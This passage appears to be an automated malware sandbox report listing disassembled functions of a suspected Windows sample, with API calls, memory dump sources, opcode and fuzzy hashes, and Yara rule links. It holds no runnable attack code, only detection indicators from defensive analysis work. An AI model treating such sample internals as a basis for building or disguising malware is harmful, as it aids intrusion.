                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,0027DA55,?), ref: 0027E2A3
                                                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0027DA55,?), ref: 0027E2B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindHandleModuleResource
                                                                                  • String ID: RTL
                                                                                  • API String ID: 3537982541-834975271
                                                                                  • Opcode ID: e1f584974cf8272c3bf8a46a0dcf4305dd93e4eba678856059207dc1e0fd8806
                                                                                  • Instruction ID: bc30ff8539dcff6fc3c80b07b6d9cdce3171d615e4c097426cc1e3757254ac12
                                                                                  • Opcode Fuzzy Hash: e1f584974cf8272c3bf8a46a0dcf4305dd93e4eba678856059207dc1e0fd8806
                                                                                  • Instruction Fuzzy Hash: 9CC0123125072067EA30AB747C0EB837A585B02B11F0A0488B685EA2D2EEA5C99486A0
                                                                                  Function 0028E47A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E467
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: U($z(
                                                                                  • API String ID: 1269201914-2305032885
                                                                                  • Opcode ID: 732ddb6fc8c4f2518335d70c73c18bbfcbc5001314174e7864bcdbd3c3211fca
                                                                                  • Instruction ID: bafdc2fae3764c21c005a65f09719b121ab9692c1615031cdb01923c0838fa1e
                                                                                  • Opcode Fuzzy Hash: 732ddb6fc8c4f2518335d70c73c18bbfcbc5001314174e7864bcdbd3c3211fca
                                                                                  • Instruction Fuzzy Hash: 71B0929967A0006D3504A3149802D3A410DC0C2F21331812AB408C01C198800E200A32
                                                                                  Function 0028E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E467
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: U($p(
                                                                                  • API String ID: 1269201914-3285457428
                                                                                  • Opcode ID: eb16490825b6fbfce2e9eda41dd3ff52b90ebaa6a4b0a41f79fe8746f5d3d2fb
                                                                                  • Instruction ID: 37f28e317a3bbb353720d22ca4edfcb0b1b0e81833de55ee10c243ce0593df0d
                                                                                  • Opcode Fuzzy Hash: eb16490825b6fbfce2e9eda41dd3ff52b90ebaa6a4b0a41f79fe8746f5d3d2fb
                                                                                  • Instruction Fuzzy Hash: 1BB0928967E040AD3604E2145802C3A010DC0C2B51331812AB808C01C1D8804C200A32

                                                                                  Executed Functions

                                                                                  Function 00007FFD9BAA0D4C Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 5[_H
                                                                                  • API String ID: 0-3279724263
                                                                                  • Opcode ID: 16982e9224464e97ed976ca3af082540964f374148aa323389ffff8b964da5e7
                                                                                  • Instruction ID: 62659eb872a5bab02046e3fa4e538eca65a41d3712a0421c7abdedc403f40df4
                                                                                  • Opcode Fuzzy Hash: 16982e9224464e97ed976ca3af082540964f374148aa323389ffff8b964da5e7
                                                                                  • Instruction Fuzzy Hash: 359116B2A19A8D4FDB99CF6888657A97FE2FF96314F0101BFD04DD72E6DAB418008750
                                                                                  Function 00007FFD9BE891A9 Relevance: .4, Instructions: 402COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fcc328291ff1791077d6fbf47aaae3103b2a849c19a9b1070314febda18a12ef
                                                                                  • Instruction ID: 730e5755ca16bc96533cb24122e9d73d248e61a27f9855cf61a0685cb6564255
                                                                                  • Opcode Fuzzy Hash: fcc328291ff1791077d6fbf47aaae3103b2a849c19a9b1070314febda18a12ef
                                                                                  • Instruction Fuzzy Hash: 4FC14938F0ED4D4FE778DA6888A95B437D5FF88311B0512B8D16EC71B2DE39A9068740
                                                                                  Function 00007FFD9BAA0B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: c9$!k9$"s9
                                                                                  • API String ID: 0-3426396564
                                                                                  • Opcode ID: f397c1ddb5e5cc0d487d95b0526f7b5ff2e1f5a7873839a4ddd0a0f855129a61
                                                                                  • Instruction ID: 6f3e87dd275b1082a34a6842e2b96f325caf35504a46e3d572cf5d234ff926d3
                                                                                  • Opcode Fuzzy Hash: f397c1ddb5e5cc0d487d95b0526f7b5ff2e1f5a7873839a4ddd0a0f855129a61
                                                                                  • Instruction Fuzzy Hash: EA01493B72D95A8BC7416B3EF8505D87B50EBD613679509BBC544CB1A2E2101C9EC3E0
                                                                                  Function 00007FFD9BE811E5 Relevance: 2.0, Strings: 1, Instructions: 715COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d
                                                                                  • API String ID: 0-2564639436
                                                                                  • Opcode ID: 6595b2eceaf39cffb16a3acd2ff19677cd9893d9a7dfcb8a1fa03dbb9eb594a4
                                                                                  • Instruction ID: 6f2a47d0c49fc652781ac2a2ea0cc55de4f73d8f1c1bd5ac95d8ce3d3140e816
                                                                                  • Opcode Fuzzy Hash: 6595b2eceaf39cffb16a3acd2ff19677cd9893d9a7dfcb8a1fa03dbb9eb594a4
                                                                                  • Instruction Fuzzy Hash: 1F222230A0DE094FD768DF58889197177E1EF99314B1502BED09ACB2A7DA36F843C782
                                                                                  Function 00007FFD9BE8C168 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: d88330f9d41b046dc9e26dd06d4c9c2bc6c1e708b2006c3e036784dcd17c92e5
                                                                                  • Instruction ID: 0e0703f9df6cf60949f0b9e9c0a9e13e2f4f0ec6e4c1667e945d14274c8b6021
                                                                                  • Opcode Fuzzy Hash: d88330f9d41b046dc9e26dd06d4c9c2bc6c1e708b2006c3e036784dcd17c92e5
                                                                                  • Instruction Fuzzy Hash: 38514D71E09E4E8FDB59DBD8C4A15ACB7B5EF59300F1141BAD02AEB392CA356A01CB50
                                                                                  Function 00007FFD9BE86468 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: c3d29ba692db5ee7d67c2262b6a96659f034b4980b03866e18e74e3320e3b48d
                                                                                  • Instruction ID: ad6168a6ed23bec234848d169425d553addb582422cdb245bbf5bc21b352c0d5
                                                                                  • Opcode Fuzzy Hash: c3d29ba692db5ee7d67c2262b6a96659f034b4980b03866e18e74e3320e3b48d
                                                                                  • Instruction Fuzzy Hash: 76516B31E09D4E8FDB59DBD4C4A15BDB7B5FF58300F1141BAC02AEB2A6CA366A01CB50
                                                                                  Function 00007FFD9BE866DF Relevance: .4, Instructions: 370COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b0c504f653072637b8102cc78ae668899d214773d82cf3e812b0108509ed996b
                                                                                  • Instruction ID: 990169d3a4265272f629c588047f959e99329e9aa3f8f16ac7d0b134e82e7449
                                                                                  • Opcode Fuzzy Hash: b0c504f653072637b8102cc78ae668899d214773d82cf3e812b0108509ed996b
                                                                                  • Instruction Fuzzy Hash: 7BD1F230619D4A8FEB59CF58C0E05B03BA5FF45304B5446FDC85A8B6ABC639F982CB80
                                                                                  Function 00007FFD9BE8C3DF Relevance: .4, Instructions: 362COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 371cab2af637d86d954656746b17d82ec389bcbee4a0e790947bdc4f213217c0
                                                                                  • Instruction ID: 7a472809320e80351c79e4d7792d7eb673ecc98ce09ae468e54b1ec1add679f8
                                                                                  • Opcode Fuzzy Hash: 371cab2af637d86d954656746b17d82ec389bcbee4a0e790947bdc4f213217c0
                                                                                  • Instruction Fuzzy Hash: BBD1D130619E498FEB58CF58C0E05B137A5FF46314B5546BDC85B8B69ACB39F982CB80
                                                                                  Function 00007FFD9BE8A110 Relevance: .3, Instructions: 338COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8113ade0c89cd3e5d02e0488b256afebe90cf081150b8fa0dfd781497462849c
                                                                                  • Instruction ID: be6adcf4889cccae645dd37b8cfeacce5e2513c78acc67a60ba97244d09d6146
                                                                                  • Opcode Fuzzy Hash: 8113ade0c89cd3e5d02e0488b256afebe90cf081150b8fa0dfd781497462849c
                                                                                  • Instruction Fuzzy Hash: 8BB17130718E1D8FDB98DF58C895A79B3E2FF59314B5141A9D05ECB2A6CA35EC42CB40
                                                                                  Function 00007FFD9BE866FF Relevance: .3, Instructions: 337COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2e539d7affbf95f4b32dfa429bd54ec974d17bc2537c08a87560ad2a53e2675e
                                                                                  • Instruction ID: d6c9aa81b343b1a4cf757685c9946442f1aece92e179febcbbbac3ed9ce336a1
                                                                                  • Opcode Fuzzy Hash: 2e539d7affbf95f4b32dfa429bd54ec974d17bc2537c08a87560ad2a53e2675e
                                                                                  • Instruction Fuzzy Hash: F4C1E33061AD4A8FEB1DCF58C0E05B13BA5FF45304B5545FDC8AA8B6ABC639E941CB81
                                                                                  Function 00007FFD9BE8C3FF Relevance: .3, Instructions: 333COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 76e5d0d9eca11a9722dcd95e0cb0ece8cbb2be964d47022db8c223c1219b80f4
                                                                                  • Instruction ID: 80ccf9418a432168fa01f6ecbd3a3e248d3840f3b05beba55109895dbfddf157
                                                                                  • Opcode Fuzzy Hash: 76e5d0d9eca11a9722dcd95e0cb0ece8cbb2be964d47022db8c223c1219b80f4
                                                                                  • Instruction Fuzzy Hash: F7C1D130619D4A8FEB19CF58C0E05B137A1FF46314B5546BDC85A8B69BCB39F542CB80
                                                                                  Function 00007FFD9BE8BC92 Relevance: .3, Instructions: 327COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f1acfdce0615798cab03b575684e57eb4e9e9a15cdf3da54f5c36b6a6e068d42
                                                                                  • Instruction ID: 812828e6c0ad0a3b538b48d005eeb3c3eea7f07657200c88c7ea7b0507fd828a
                                                                                  • Opcode Fuzzy Hash: f1acfdce0615798cab03b575684e57eb4e9e9a15cdf3da54f5c36b6a6e068d42
                                                                                  • Instruction Fuzzy Hash: 37C1F630A0AE4E8FD759DB68C4A16A4B7E5FF45300F4541B9C05EC7AA6CB3AF951CB80
                                                                                  Function 00007FFD9BE89667 Relevance: .3, Instructions: 291COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 00ca4920d6273b232746d02f8ec37f92833a202ebd521d2d4c2506534e0d5132
                                                                                  • Instruction ID: e2309d3e28242d2873553a619b7910d418b909837a7c9c36eaed7d580f9530ab
                                                                                  • Opcode Fuzzy Hash: 00ca4920d6273b232746d02f8ec37f92833a202ebd521d2d4c2506534e0d5132
                                                                                  • Instruction Fuzzy Hash: EC210A1AF0FE9B8AF235A2F8283D0B85A445F51234F1A11BBC56D5B4E3DC1E29055382
                                                                                  Function 00007FFD9BE85FEA Relevance: .3, Instructions: 287COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9b2a5e50ab4f5de1ed86f8c234c0061c436aed760ffc13bfa421813b789ff569
                                                                                  • Instruction ID: 474eea6ba178687fa8eec3acc7a436fd107e74736b90d241617999f079c5d71c
                                                                                  • Opcode Fuzzy Hash: 9b2a5e50ab4f5de1ed86f8c234c0061c436aed760ffc13bfa421813b789ff569
                                                                                  • Instruction Fuzzy Hash: 7BA1053060EE4A8FD75ADB68C4A05A0B7E5FF15300F4541B9C45ECBA97CB39B951C781
                                                                                  Function 00007FFD9BE839A0 Relevance: .3, Instructions: 286COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5cd99a5c092b1221a57d3eb067d77b969670ad77dc63b41c5ccc02986d508080
                                                                                  • Instruction ID: feb0c1946aa2231b98aaec9fce76e18a1aea3c756d0f9165ef8a0209ddb4b405
                                                                                  • Opcode Fuzzy Hash: 5cd99a5c092b1221a57d3eb067d77b969670ad77dc63b41c5ccc02986d508080
                                                                                  • Instruction Fuzzy Hash: 4C11A445F0FEDA8AF77691B918360B826445F11335F1A01BBE46E8A0F7DC2E2D415292
                                                                                  Function 00007FFD9BE8B1D6 Relevance: .3, Instructions: 260COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 40008afe1484ed9745cead94609934af99bfe57da71022e8c5eb3e4772fb9f5d
                                                                                  • Instruction ID: 483249ca5321203666098dc97cd25c3dc5f3c2a770b4330d438e2ac2b0f7a4be
                                                                                  • Opcode Fuzzy Hash: 40008afe1484ed9745cead94609934af99bfe57da71022e8c5eb3e4772fb9f5d
                                                                                  • Instruction Fuzzy Hash: 1D815831A0EE0A8FE3399A78946557977E8EF42311B16057ED0AFC71A3DA3B75028741
                                                                                  Function 00007FFD9BE854D6 Relevance: .3, Instructions: 253COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8687dfe071c2264de2c88c8de704e32b149e6e15c0f599e976924abb8c449ebb
                                                                                  • Instruction ID: 895f6ecd9899241f3cd09abbff51f2ce5d48a69a6d7117c496957d1759e8445c
                                                                                  • Opcode Fuzzy Hash: 8687dfe071c2264de2c88c8de704e32b149e6e15c0f599e976924abb8c449ebb
                                                                                  • Instruction Fuzzy Hash: 21713831B1EE0A8FE3385BA894654B977F5EF41310B16067ED09FC35A2DE3A79028751
                                                                                  Function 00007FFD9BE8EAC7 Relevance: .3, Instructions: 251COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 887c455aaa6e35162cffe2edf69fded4c33a822c61c5b3ca545dd31d8bc6979e
                                                                                  • Instruction ID: 30316820ed2efe8b72791f0e2c6a294623d6c2d69ecaf9dc8b6eb20e48c09e56
                                                                                  • Opcode Fuzzy Hash: 887c455aaa6e35162cffe2edf69fded4c33a822c61c5b3ca545dd31d8bc6979e
                                                                                  • Instruction Fuzzy Hash: CB710731A0ED8D4FE778DA5888665B437D4FF44311B1602B9F0AFC75B2DD3AAA068781
                                                                                  Function 00007FFD9BE83639 Relevance: .3, Instructions: 251COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7bcd45a27d030dbebdc06bba70ede53099a558ede036370dd9c9acb7d37d1ed0
                                                                                  • Instruction ID: e3c14d3084da28a513b5eec927e6786755be6e2cccc18b2af98f5fca583cf219
                                                                                  • Opcode Fuzzy Hash: 7bcd45a27d030dbebdc06bba70ede53099a558ede036370dd9c9acb7d37d1ed0
                                                                                  • Instruction Fuzzy Hash: 3C71487160ED4D4FD779DA5884664B537E4EF4431071203B9F06EC35B2DA2BE9068781
                                                                                  Function 00007FFD9BE89EDB Relevance: .2, Instructions: 228COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8e3094494d9ff94e6b743e8bec3fb2a4d8072ce1a19747f3e948c1e73715248e
                                                                                  • Instruction ID: 1c74fa8b311a32ca3627cd58aa5f51d20dee30605b0b2b4886588eb316b4c7aa
                                                                                  • Opcode Fuzzy Hash: 8e3094494d9ff94e6b743e8bec3fb2a4d8072ce1a19747f3e948c1e73715248e
                                                                                  • Instruction Fuzzy Hash: E771C330E1EE4E8EEB69DBA488646FC77E4EF55300F1105BAD02EC71E5DE3A69419701
                                                                                  Function 00007FFD9BE8D421 Relevance: .2, Instructions: 227COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 251be0b30dfdf986f127fae77701cc5bb3f171d83c684a5350688e3be2f16ca3
                                                                                  • Instruction ID: 07f7de8d8ac33e36bd873bf96d52002ec7d6bba79204fbe65e7c97a9f6847494
                                                                                  • Opcode Fuzzy Hash: 251be0b30dfdf986f127fae77701cc5bb3f171d83c684a5350688e3be2f16ca3
                                                                                  • Instruction Fuzzy Hash: 2381A130A0AF0E8FD369DB54D1A457177E5FF04304B51857EC4AEC7AA6CA3AB942CB41
                                                                                  Function 00007FFD9BE841FB Relevance: .2, Instructions: 226COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8fe05c4914784568d2c85579eabd44d468cecd8831939b313d64cb929f45c1dc
                                                                                  • Instruction ID: 82254d5428abab921ca04d00fdecda9479842808ef2887285639a07cc368a4c8
                                                                                  • Opcode Fuzzy Hash: 8fe05c4914784568d2c85579eabd44d468cecd8831939b313d64cb929f45c1dc
                                                                                  • Instruction Fuzzy Hash: 3071D430E1EE4E8FE7A5DBA488656BC7BB4EF55300F1101BED02ED71A2DA396A418701
                                                                                  Function 00007FFD9BE87721 Relevance: .2, Instructions: 224COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
